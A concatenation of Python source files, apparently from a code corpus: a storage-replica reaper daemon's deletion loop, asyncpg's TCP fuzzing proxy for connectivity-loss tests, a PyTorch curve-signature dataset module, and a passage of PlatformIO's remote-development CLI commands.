update_replicas_states(replicas=[dict(replica.items() + [('state', ReplicaState.BEING_DELETED), ('rse_id', rse['id'])]) for replica in files], nowait=True)
for replica in files:
try:
replica['pfn'] = str(rsemgr.lfns2pfns(rse_settings=rse_info,
lfns=[{'scope': replica['scope'].external, 'name': replica['name'], 'path': replica['path']}],
operation='delete', scheme=scheme).values()[0])
except (ReplicaUnAvailable, ReplicaNotFound) as error:
err_msg = 'Failed to get pfn UNAVAILABLE replica %s:%s on %s with error %s' % (replica['scope'], replica['name'], rse['rse'], str(error))
logging.warning('Reaper %s-%s: %s', worker_number, child_number, err_msg)
replica['pfn'] = None
monitor.record_counter(counters='reaper.deletion.being_deleted', delta=len(files))
try:
deleted_files = []
prot.connect()
for replica in files:
try:
logging.info('Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
start = time.time()
if rse['staging_area'] or rse['rse'].endswith("STAGING"):
logging.warning('Reaper %s-%s: Deletion STAGING of %s:%s as %s on %s, will only delete the catalog and not do physical deletion',
worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
else:
if replica['pfn']:
pfn = replica['pfn']
# sign the URL if necessary
if prot.attributes['scheme'] == 'https' and rse_info['sign_url'] is not None:
pfn = get_signed_url(rse_info['sign_url'], 'delete', pfn)
prot.delete(pfn)
else:
logging.warning('Reaper %s-%s: Deletion UNAVAILABLE of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
monitor.record_timer('daemons.reaper.delete.%s.%s' % (prot.attributes['scheme'], rse['rse']), (time.time() - start) * 1000)
duration = time.time() - start
deleted_files.append({'scope': replica['scope'], 'name': replica['name']})
add_message('deletion-done', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse_info['rse'],
'rse_id': rse_info['id'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'duration': duration,
'protocol': prot.attributes['scheme']})
logging.info('Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], duration)
except SourceNotFound:
err_msg = 'Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
logging.warning(err_msg)
deleted_files.append({'scope': replica['scope'], 'name': replica['name']})
if replica['state'] == ReplicaState.AVAILABLE:
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse_info['rse'],
'rse_id': rse_info['id'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(err_msg),
'protocol': prot.attributes['scheme']})
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse_info['rse'],
'rse_id': rse_info['id'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error),
'protocol': prot.attributes['scheme']})
except Exception as error:
logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse_info['rse'],
'rse_id': rse_info['id'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error),
'protocol': prot.attributes['scheme']})
except:
logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
for replica in files:
logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse_info['rse'],
'rse_id': rse_info['id'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error),
'protocol': prot.attributes['scheme']})
break
finally:
prot.close()
start = time.time()
with monitor.record_timer_block('reaper.delete_replicas'):
delete_replicas(rse_id=rse['id'], files=deleted_files)
logging.debug('Reaper %s-%s: delete_replicas successes %s %s %s', worker_number, child_number, rse['rse'], len(deleted_files), time.time() - start)
monitor.record_counter(counters='reaper.deletion.done', delta=len(deleted_files))
except DatabaseException as error:
logging.warning('Reaper %s-%s: DatabaseException %s', worker_number, child_number, str(error))
except UnsupportedOperation as error:
logging.warning('Reaper %s-%s: UnsupportedOperation %s', worker_number, child_number, str(error))
except:
logging.critical(traceback.format_exc())
except RSENotFound as error:
logging.warning('Reaper %s-%s: RSE not found %s', worker_number, child_number, str(error))
except:
logging.critical(traceback.format_exc())
if once:
break
time.sleep(1)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, threads_per_worker=None, once=False, greedy=False, rses=[], scheme=None, exclude_rses=None, include_rses=None, delay_seconds=0):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param threads_per_worker: Total number of threads created by each worker.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
"""
logging.info('main: starting processes')
all_rses = rse_core.list_rses()
if rses:
invalid = set(rses) - set([rse['rse'] for rse in all_rses])
if invalid:
msg = 'RSE{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
', '.join([repr(rse) for rse in invalid]))
raise RSENotFound(msg)
rses = [rse for rse in all_rses if rse['rse'] in rses]
else:
rses = all_rses
if exclude_rses:
excluded_rses = parse_expression(exclude_rses)
rses = [rse for rse in rses if rse not in excluded_rses]
if include_rses:
included_rses = parse_expression(include_rses)
rses = [rse for rse in rses if rse in included_rses]
if not rses:
logging.error('Reaper: No RSEs found. Exiting.')
return
logging.info('Reaper: This instance will work on RSEs: ' + ', '.join([rse['rse'] for rse in rses]))
threads = []
nb_rses_per_worker = int(math.ceil(len(rses) / float(total_workers))) or 1
rses = random.sample(rses, len(rses))
for worker in range(total_workers):
for child in range(threads_per_worker or 1):
rses_list = rses[worker * nb_rses_per_worker: worker * nb_rses_per_worker + nb_rses_per_worker]
if not rses_list:
logging.warning('Reaper: Empty RSEs list for worker %(worker)s' % locals())
continue
kwargs = {'worker_number': worker,
'child_number': child + 1,
'total_children': threads_per_worker or 1,
'once': once,
'chunk_size': chunk_size,
'greedy': greedy,
'rses': rses_list,
'delay_seconds': delay_seconds,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, child: %s' % (worker, child + 1)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
fuzzer.py | # Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import asyncio
import socket
import threading
import typing
from asyncpg import cluster
class StopServer(Exception):
pass
class TCPFuzzingProxy:
def __init__(self, *, listening_addr: str='127.0.0.1',
listening_port: typing.Optional[int]=None,
backend_host: str, backend_port: int,
settings: typing.Optional[dict]=None) -> None:
self.listening_addr = listening_addr
self.listening_port = listening_port
self.backend_host = backend_host
self.backend_port = backend_port
self.settings = settings or {}
self.loop = None
self.connectivity = None
self.connectivity_loss = None
self.stop_event = None
self.connections = {}
self.sock = None
self.listen_task = None
async def _wait(self, work):
work_task = asyncio.ensure_future(work, loop=self.loop)
stop_event_task = asyncio.ensure_future(self.stop_event.wait(),
loop=self.loop)
try:
await asyncio.wait(
[work_task, stop_event_task],
return_when=asyncio.FIRST_COMPLETED,
loop=self.loop)
if self.stop_event.is_set():
raise StopServer()
else:
return work_task.result()
finally:
if not work_task.done():
work_task.cancel()
if not stop_event_task.done():
stop_event_task.cancel()
def start(self):
started = threading.Event()
self.thread = threading.Thread(target=self._start, args=(started,))
self.thread.start()
if not started.wait(timeout=2):
raise RuntimeError('fuzzer proxy failed to start')
def stop(self):
self.loop.call_soon_threadsafe(self._stop)
self.thread.join()
def _stop(self):
self.stop_event.set()
def _start(self, started_event):
self.loop = asyncio.new_event_loop()
self.connectivity = asyncio.Event(loop=self.loop)
self.connectivity.set()
self.connectivity_loss = asyncio.Event(loop=self.loop)
self.stop_event = asyncio.Event(loop=self.loop)
if self.listening_port is None:
self.listening_port = cluster.find_available_port()
self.sock = socket.socket()
self.sock.bind((self.listening_addr, self.listening_port))
self.sock.listen(50)
self.sock.setblocking(False)
try:
self.loop.run_until_complete(self._main(started_event))
finally:
self.loop.close()
async def _main(self, started_event):
self.listen_task = asyncio.ensure_future(self.listen(), loop=self.loop)
# Notify the main thread that we are ready to go.
started_event.set()
try:
await self.listen_task
finally:
for c in list(self.connections):
c.close()
await asyncio.sleep(0.01, loop=self.loop)
if hasattr(self.loop, 'remove_reader'):
self.loop.remove_reader(self.sock.fileno())
self.sock.close()
async def listen(self):
while True:
try:
client_sock, _ = await self._wait(
self.loop.sock_accept(self.sock))
backend_sock = socket.socket()
backend_sock.setblocking(False)
await self._wait(self.loop.sock_connect(
backend_sock, (self.backend_host, self.backend_port)))
except StopServer:
break
conn = Connection(client_sock, backend_sock, self)
conn_task = self.loop.create_task(conn.handle())
self.connections[conn] = conn_task
def trigger_connectivity_loss(self):
self.loop.call_soon_threadsafe(self._trigger_connectivity_loss)
def _trigger_connectivity_loss(self):
self.connectivity.clear()
self.connectivity_loss.set()
def restore_connectivity(self):
self.loop.call_soon_threadsafe(self._restore_connectivity)
def _restore_connectivity(self):
self.connectivity.set()
self.connectivity_loss.clear()
def reset(self):
self.restore_connectivity()
def _close_connection(self, connection):
conn_task = self.connections.pop(connection, None)
if conn_task is not None:
conn_task.cancel()
class Connection:
def __init__(self, client_sock, backend_sock, proxy):
self.client_sock = client_sock
self.backend_sock = backend_sock
self.proxy = proxy
self.loop = proxy.loop
self.connectivity = proxy.connectivity
self.connectivity_loss = proxy.connectivity_loss
self.proxy_to_backend_task = None
self.proxy_from_backend_task = None
self.is_closed = False
def close(self):
if self.is_closed:
return
self.is_closed = True
if self.proxy_to_backend_task is not None:
self.proxy_to_backend_task.cancel()
self.proxy_to_backend_task = None
if self.proxy_from_backend_task is not None:
self.proxy_from_backend_task.cancel()
self.proxy_from_backend_task = None
self.proxy._close_connection(self)
async def handle(self):
self.proxy_to_backend_task = asyncio.ensure_future(
self.proxy_to_backend(), loop=self.loop)
self.proxy_from_backend_task = asyncio.ensure_future(
self.proxy_from_backend(), loop=self.loop)
try:
await asyncio.wait(
[self.proxy_to_backend_task, self.proxy_from_backend_task],
loop=self.loop, return_when=asyncio.FIRST_COMPLETED)
finally:
# Asyncio fails to properly remove the readers and writers
# when the task doing recv() or send() is cancelled, so
# we must remove the readers and writers manually before
# closing the sockets.
self.loop.remove_reader(self.client_sock.fileno())
self.loop.remove_writer(self.client_sock.fileno())
self.loop.remove_reader(self.backend_sock.fileno())
self.loop.remove_writer(self.backend_sock.fileno())
self.client_sock.close()
self.backend_sock.close()
async def _read(self, sock, n):
read_task = asyncio.ensure_future(
self.loop.sock_recv(sock, n),
loop=self.loop)
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait(),
loop=self.loop)
try:
await asyncio.wait(
[read_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED,
loop=self.loop)
if self.connectivity_loss.is_set():
return None
else:
return read_task.result()
finally:
if not read_task.done():
read_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def _write(self, sock, data):
write_task = asyncio.ensure_future(
self.loop.sock_sendall(sock, data), loop=self.loop)
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait(), loop=self.loop)
try:
await asyncio.wait(
[write_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED,
loop=self.loop)
if self.connectivity_loss.is_set():
return None
else:
return write_task.result()
finally:
if not write_task.done():
write_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def proxy_to_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.client_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.backend_sock, data)
except ConnectionError:
pass
finally:
self.loop.call_soon(self.close)
async def proxy_from_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.backend_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.client_sock, data)
except ConnectionError:
pass
finally:
self.loop.call_soon(self.close)
|
datasets.py | # python peripherals
import os
import numpy
import random
import queue
from multiprocessing import Process, Queue, cpu_count
# torch
import torch
from torch.utils.data import Dataset
# deep_signature
from deep_signature.data_generation import curve_generation
from deep_signature.data_generation import dataset_generation
from deep_signature.data_manipulation import curve_processing
class DeepSignaturePairsDataset(Dataset):
def __init__(self):
self._pairs = None
self._labels = None
def load_dataset(self, negative_pairs_dir_path, positive_pairs_dir_path):
negative_pairs = numpy.load(file=os.path.normpath(os.path.join(negative_pairs_dir_path, 'negative_pairs.npy')), allow_pickle=True)
positive_pairs = numpy.load(file=os.path.normpath(os.path.join(positive_pairs_dir_path, 'positive_pairs.npy')), allow_pickle=True)
# pairs_count = numpy.minimum(negative_pairs.shape[0], positive_pairs.shape[0])
# full_pairs_count = 2 * pairs_count
full_pairs_count = negative_pairs.shape[0] + positive_pairs.shape[0]
random.shuffle(negative_pairs)
random.shuffle(positive_pairs)
# negative_pairs = negative_pairs[:pairs_count]
# positive_pairs = positive_pairs[:pairs_count]
self._pairs = numpy.empty((full_pairs_count, negative_pairs.shape[1], negative_pairs.shape[2], negative_pairs.shape[3]))
self._pairs[:negative_pairs.shape[0], :] = negative_pairs
self._pairs[negative_pairs.shape[0]:, :] = positive_pairs
# del negative_pairs
# del positive_pairs
negaitve_labels = numpy.zeros(negative_pairs.shape[0])
positive_labels = numpy.ones(positive_pairs.shape[0])
self._labels = numpy.empty(full_pairs_count)
self._labels[:negative_pairs.shape[0]] = negaitve_labels
self._labels[negative_pairs.shape[0]:] = positive_labels
# self._labels[::2] = negaitve_labels
# self._labels[1::2] = positive_labels
def __len__(self):
return self._labels.shape[0]
def __getitem__(self, idx):
pair = self._pairs[idx, :]
for i in range(2):
if not curve_processing.is_ccw(curve=pair[i]):
pair[i] = numpy.flip(pair[i], axis=0)
for i in range(2):
radians = curve_processing.calculate_secant_angle(curve=pair[i])
pair[i] = curve_processing.rotate_curve(curve=pair[i], radians=radians)
pair_torch = torch.from_numpy(pair).cuda().double()
label_torch = torch.from_numpy(numpy.array([self._labels[idx]])).cuda().double()
return {
'input': pair_torch,
'labels': label_torch
}
class DeepSignatureTupletsDataset(Dataset):
def __init__(self):
self._tuplets = None
def load_dataset(self, dir_path):
self._tuplets = numpy.load(file=os.path.normpath(os.path.join(dir_path, 'tuplets.npy')), allow_pickle=True)
def __len__(self):
return self._tuplets.shape[0]
def __getitem__(self, index):
item = {}
tuplet = self._tuplets[index]
for key in tuplet.keys():
item[key] = torch.from_numpy(numpy.array(self._tuplets[index][key]).astype('float64')).cuda().double()
return item
class EuclideanTuple:
@staticmethod
def _generate_curvature_tuple(curves, sampling_ratio, multimodality, supporting_points_count, offset_length, negative_examples_count):
return dataset_generation.EuclideanCurvatureTupletsDatasetGenerator.generate_tuple(
curves=curves,
sampling_ratio=sampling_ratio,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
offset_length=offset_length,
negative_examples_count=negative_examples_count)
@staticmethod
def _generate_arclength_tuple(curves, multimodality, supporting_points_count, min_offset, max_offset):
return dataset_generation.EuclideanArcLengthTupletsDatasetGenerator.generate_tuple(
curves=curves,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
min_offset=min_offset,
max_offset=max_offset)
class EquiaffineTuple:
@staticmethod
def _generate_curvature_tuple(curves, sampling_ratio, multimodality, supporting_points_count, offset_length, negative_examples_count):
return dataset_generation.EquiaffineCurvatureTupletsDatasetGenerator.generate_tuple(
curves=curves,
sampling_ratio=sampling_ratio,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
offset_length=offset_length,
negative_examples_count=negative_examples_count)
# @staticmethod
# def _generate_arclength_tuple(curves, sampling_ratio, multimodality, section_points_count):
# return dataset_generation.EquiaffineArclengthTupletsDatasetGenerator.generate_tuple(
# curves=curves,
# sampling_ratio=sampling_ratio,
# multimodality=multimodality,
# section_points_count=section_points_count)
@staticmethod
def _generate_arclength_tuple(curves, multimodality, supporting_points_count, min_offset, max_offset):
return dataset_generation.EquiaffineArcLengthTupletsDatasetGenerator.generate_tuple(
curves=curves,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
min_offset=min_offset,
max_offset=max_offset)
class AffineTuple:
@staticmethod
def _generate_curvature_tuple(curves, sampling_ratio, multimodality, supporting_points_count, offset_length, negative_examples_count):
return dataset_generation.AffineCurvatureTupletsDatasetGenerator.generate_tuple(
curves=curves,
sampling_ratio=sampling_ratio,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
offset_length=offset_length,
negative_examples_count=negative_examples_count)
# @staticmethod
# def _generate_arclength_tuple(curves, sampling_ratio, multimodality, section_points_count):
# return dataset_generation.AffineArclengthTupletsDatasetGenerator.generate_tuple(
# curves=curves,
# sampling_ratio=sampling_ratio,
# multimodality=multimodality,
# section_points_count=section_points_count)
@staticmethod
def _generate_arclength_tuple(curves, multimodality, supporting_points_count, min_offset, max_offset):
return dataset_generation.AffineArcLengthTupletsDatasetGenerator.generate_tuple(
curves=curves,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
min_offset=min_offset,
max_offset=max_offset)
class DeepSignatureTupletsOnlineDataset(Dataset):
def __init__(self, dataset_size, dir_path, sampling_ratio, multimodality, replace, buffer_size, num_workers):
self._curves = curve_generation.CurvesGenerator.load_curves(dir_path)
self._dataset_size = dataset_size
self._sampling_ratio = sampling_ratio
self._multimodality = multimodality
self._replace = replace
self._buffer_size = buffer_size
self._num_workers = num_workers
self._q = Queue()
self._args = [self._curves, self._sampling_ratio, self._multimodality, self._q]
self._items = []
def __len__(self):
return self._dataset_size
def __getitem__(self, index):
item = {}
mod_index = numpy.mod(index, self._buffer_size)
tuplet = self._items[mod_index]
for key in tuplet.keys():
item[key] = torch.from_numpy(numpy.array(tuplet[key]).astype('float64')).cuda().double()
if self._replace is True:
try:
new_tuplet = self._q.get_nowait()
rand_index = int(numpy.random.randint(self._buffer_size, size=1))
self._items[rand_index] = new_tuplet
except queue.Empty:
pass
return item
def start(self):
self._workers = [Process(target=self._map_func, args=self._args) for i in range(self._num_workers)]
for i, worker in enumerate(self._workers):
worker.start()
print(f'\rWorker Started {i+1} / {self._num_workers}', end='')
print(f'\nItem {len(self._items)} / {self._buffer_size}', end='')
while True:
if self._q.empty() is False:
self._items.append(self._q.get())
print(f'\rItem {len(self._items)} / {self._buffer_size}', end='')
if len(self._items) == self._buffer_size:
break
def stop(self):
for i, worker in enumerate(self._workers):
worker.terminate()
class DeepSignatureCurvatureTupletsOnlineDataset(DeepSignatureTupletsOnlineDataset):
def __init__(self, dataset_size, dir_path, sampling_ratio, multimodality, replace, buffer_size, num_workers, supporting_points_count, offset_length, negative_examples_count):
DeepSignatureTupletsOnlineDataset.__init__(
self,
dataset_size=dataset_size,
dir_path=dir_path,
sampling_ratio=sampling_ratio,
multimodality=multimodality,
replace=replace,
buffer_size=buffer_size,
num_workers=num_workers)
self._supporting_points_count = supporting_points_count
self._args.append(supporting_points_count)
self._offset_length = offset_length
self._args.append(offset_length)
self._negative_examples_count = negative_examples_count
self._args.append(negative_examples_count)
@classmethod
def _map_func(cls, curves, sampling_ratio, multimodality, q, supporting_points_count, offset_length, negative_examples_count):
while True:
q.put(cls._generate_curvature_tuple(
curves=curves,
sampling_ratio=sampling_ratio,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
offset_length=offset_length,
negative_examples_count=negative_examples_count))
class DeepSignatureEuclideanCurvatureTupletsOnlineDataset(DeepSignatureCurvatureTupletsOnlineDataset, EuclideanTuple):
pass
class DeepSignatureEquiaffineCurvatureTupletsOnlineDataset(DeepSignatureCurvatureTupletsOnlineDataset, EquiaffineTuple):
pass
class DeepSignatureAffineCurvatureTupletsOnlineDataset(DeepSignatureCurvatureTupletsOnlineDataset, AffineTuple):
pass
class DeepSignatureArclengthTupletsOnlineDataset(DeepSignatureTupletsOnlineDataset):
def __init__(self, dataset_size, dir_path, sampling_ratio, multimodality, replace, buffer_size, num_workers, section_points_count, supporting_points_count, min_offset, max_offset):
DeepSignatureTupletsOnlineDataset.__init__(
self,
dataset_size=dataset_size,
dir_path=dir_path,
sampling_ratio=sampling_ratio,
multimodality=multimodality,
replace=replace,
buffer_size=buffer_size,
num_workers=num_workers)
self._section_points_count = section_points_count
self._args.append(section_points_count)
self._supporting_points_count = supporting_points_count
self._args.append(supporting_points_count)
self._min_offset = min_offset
self._args.append(min_offset)
self._max_offset = max_offset
self._args.append(max_offset)
@classmethod
def _map_func(cls, curves, sampling_ratio, multimodality, q, section_points_count, supporting_points_count, min_offset, max_offset):
while True:
q.put(cls._generate_arclength_tuple(
curves=curves,
multimodality=multimodality,
supporting_points_count=supporting_points_count,
min_offset=min_offset,
max_offset=max_offset))
# q.put(cls._generate_arclength_tuple(
# curves=curves,
# sampling_ratio=sampling_ratio,
# multimodality=multimodality,
# section_points_count=section_points_count,
# supporting_points_count=supporting_points_count,
# min_offset=min_offset,
# max_offset=max_offset))
class DeepSignatureEuclideanArclengthTupletsOnlineDataset(DeepSignatureArclengthTupletsOnlineDataset, EuclideanTuple):
pass
class DeepSignatureEquiaffineArclengthTupletsOnlineDataset(DeepSignatureArclengthTupletsOnlineDataset, EquiaffineTuple):
pass
class DeepSignatureAffineArclengthTupletsOnlineDataset(DeepSignatureArclengthTupletsOnlineDataset, AffineTuple):
pass |
command.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-arguments, import-outside-toplevel
# pylint: disable=inconsistent-return-statements
import os
import subprocess
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import fs, proc
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.commands.run.command import cli as cmd_run
from platformio.commands.test.command import cli as cmd_test
from platformio.package.manager.core import inject_contrib_pysite
from platformio.project.exception import NotPlatformIOProjectError
@click.group("remote", short_help="Remote development")
@click.option("-a", "--agent", multiple=True)
@click.pass_context
def cli(ctx, agent):
ctx.obj = agent
inject_contrib_pysite(verify_openssl=True)
@cli.group("agent", short_help="Start a new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(name, share, working_dir):
from platformio.commands.remote.client.agent_service import RemoteAgentService
RemoteAgentService(name, share, working_dir).connect()
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
from platformio.commands.remote.client.agent_list import AgentListClient
AgentListClient().connect()
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
@click.pass_obj
def remote_update(agents, only_check, dry_run):
from platformio.commands.remote.client.update_core import UpdateCoreClient
UpdateCoreClient("update", agents, dict(only_check=only_check or dry_run)).connect()
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_run(
ctx,
agents,
environment,
target,
upload_port,
project_dir,
disable_auto_clean,
force_remote,
silent,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"run",
agents,
dict(
environment=environment,
target=target,
upload_port=upload_port,
project_dir=project_dir,
disable_auto_clean=disable_auto_clean,
force_remote=force_remote,
silent=silent,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
local_targets = []
if "clean" in target:
local_targets = ["clean"]
elif set(["buildfs", "uploadfs", "uploadfsota"]) & set(target):
local_targets = ["buildfs"]
else:
local_targets = ["checkprogsize", "buildprog"]
ctx.invoke(
cmd_run,
environment=environment,
target=local_targets,
project_dir=project_dir,
# disable_auto_clean=True,
silent=silent,
verbose=verbose,
)
if any(["upload" in t for t in target] + ["program" in target]):
click.secho("Uploading firmware remotely", bold=True)
cr.options["target"] += ("nobuild",)
cr.options["disable_auto_clean"] = True
cr.connect()
return True
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_test(
ctx,
agents,
environment,
ignore,
upload_port,
test_port,
project_dir,
force_remote,
without_building,
without_uploading,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"test",
agents,
dict(
environment=environment,
ignore=ignore,
upload_port=upload_port,
test_port=test_port,
project_dir=project_dir,
force_remote=force_remote,
without_building=without_building,
without_uploading=without_uploading,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
ctx.invoke(
cmd_test,
environment=environment,
ignore=ignore,
project_dir=project_dir,
without_uploading=True,
without_testing=True,
verbose=verbose,
)
click.secho("Testing project remotely", bold=True)
cr.options["without_building"] = True
cr.connect()
return True
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
@click.pass_obj
def device_list(agents, json_output):
from platformio.commands.remote.client.device_list import DeviceListClient
DeviceListClient(agents, json_output).connect()
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
"-e",
"--environment",
help="Load configuration from `platformio.ini` and specified environment",
)
@click.option(
"--sock",
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.pass_obj
@click.pass_context
